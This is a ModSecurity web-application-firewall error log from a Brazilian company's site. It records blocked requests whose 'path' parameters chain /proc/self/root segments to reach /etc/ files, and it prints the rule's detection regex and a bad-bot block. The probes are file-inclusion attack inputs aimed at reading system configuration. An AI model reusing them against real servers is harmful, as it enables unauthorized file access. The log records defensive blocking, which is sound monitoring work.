[Tue Mar 17 12:06:13.591349 2026] [:error] [pid 17965:tid 140411616036608] [client 74.7.243.203:59502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt5at8Nd0UC_OcbVG-TQAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:13.662131 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.46:36696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt5dY0UrI5A3LftIzwjwAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:16.476376 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.241.46:60986] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt6AeiSKl8TjouI-YP2QAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:18.122723 2026] [:error] [pid 17965:tid 140411641214720] [client 74.7.243.203:50688] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt6qt8Nd0UC_OcbVG-VwAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:20.511218 2026] [:error] [pid 18380:tid 140411725141760] [client 74.7.243.203:50692] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt7K4xEDsg_V3ESNZAkQAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:31.920835 2026] [:error] [pid 9155:tid 140411641214720] [client 74.7.243.203:34588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt99bI7zhHXcabyMU0FwAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:32.929880 2026] [:error] [pid 9155:tid 140411557287680] [client 74.7.241.46:60990] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt-NbI7zhHXcabyMU0GQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:33.261916 2026] [:error] [pid 11293:tid 140411590858496] [client 74.7.243.203:45382] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt-dCmCSWTlPouqorZpwAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:36.587755 2026] [:error] [pid 2160:tid 140411632822016] [client 74.7.241.46:54508] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt_Djrdei6i7MVRTDRqwAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:40.072045 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.241.46:54510] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluANCmCSWTlPouqorZrAAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:46.143890 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.241.46:53256] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluBq4xEDsg_V3ESNZAmQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:47.803495 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.243.203:45392] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluB6BJNF7axNlVR0UKmwAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:50.269466 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:41262] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluCgeiSKl8TjouI-YP5wAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:57.917669 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.241.46:53258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluEQeiSKl8TjouI-YP7wAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:58.295140 2026] [:error] [pid 9299:tid 140411632822016] [client 74.7.243.203:35414] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluEr-sgTmmJoPuMdysXAAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:59.202969 2026] [:error] [pid 11293:tid 140411574073088] [client 74.7.241.46:55446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluE9CmCSWTlPouqorZsQAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:07:01.377425 2026] [:error] [pid 2160:tid 140411716749056] [client 74.7.241.46:55462] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluFDjrdei6i7MVRTDRswAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:07:02.663283 2026] [:error] [pid 11293:tid 140411691570944] [client 74.7.243.203:35416] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluFtCmCSWTlPouqorZtQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:07:03.086294 2026] [:error] [pid 2160:tid 140411708356352] [client 74.7.244.31:48292] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abluFzjrdei6i7MVRTDRtQAAAQQ"]
[Tue Mar 17 12:07:07.176197 2026] [:error] [pid 2160:tid 140411599251200] [client 74.7.243.203:46184] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluGzjrdei6i7MVRTDRvAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:07:16.682526 2026] [:error] [pid 18380:tid 140411548894976] [client 74.7.243.203:46186] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluJK4xEDsg_V3ESNZApAAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:07:20.663140 2026] [:error] [pid 2160:tid 140411683178240] [client 74.7.241.46:55468] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluKDjrdei6i7MVRTDRyAAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
